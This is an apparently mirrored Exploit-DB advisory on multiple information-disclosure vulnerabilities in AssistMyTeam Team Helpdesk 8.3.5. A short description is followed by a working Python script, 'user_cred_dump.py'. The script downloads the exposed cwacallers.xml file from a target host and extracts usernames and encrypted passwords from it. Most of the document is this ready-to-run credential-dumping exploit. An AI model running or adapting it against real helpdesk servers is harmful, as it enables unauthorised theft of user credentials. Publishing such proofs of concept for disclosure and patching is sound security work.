AssistMyTeam Team Helpdesk – Multiple Information Disclosure Vulnerabilities - 体验盒子

作者： bhamb

日期： 2014-05-05

类别：

remote

平台：

multiple

来源：https://www.exploit-db.com/exploits/39175/

source: https://www.securityfocus.com/bid/67271/info

AssistMyTeam Team Helpdesk is prone to multiple information-disclosure vulnerabilities.

Successfully exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.

Team Helpdesk 8.3.5 is vulnerable; other versions may also be affected. 

#!/usr/bin/python

import sys
import re
import os
import subprocess

print "This is an User Credential Dump for Team Helpdesk Customer Wev Service 8.3.5 (and prior) by bhamb.\n"
print "Send any comment to ccb3b72@gmail.com\n"

if len(sys.argv) != 2:
	print('Usage: user_cred_dump.py https://Hostname.com')
	exit(1)

hostname=sys.argv[1]+"/cws/bin/cwacallers.xml"
print hostname
subprocess.Popen(['wget', '--no-check-certificate',hostname]).communicate()

print "The following usernames and encrypted password were found.\n"
cmd="cat cwacallers.xml | grep '@' | cut -d'\"' -f4,6 | sed 's/\"/:/g' "
test=os.system(cmd)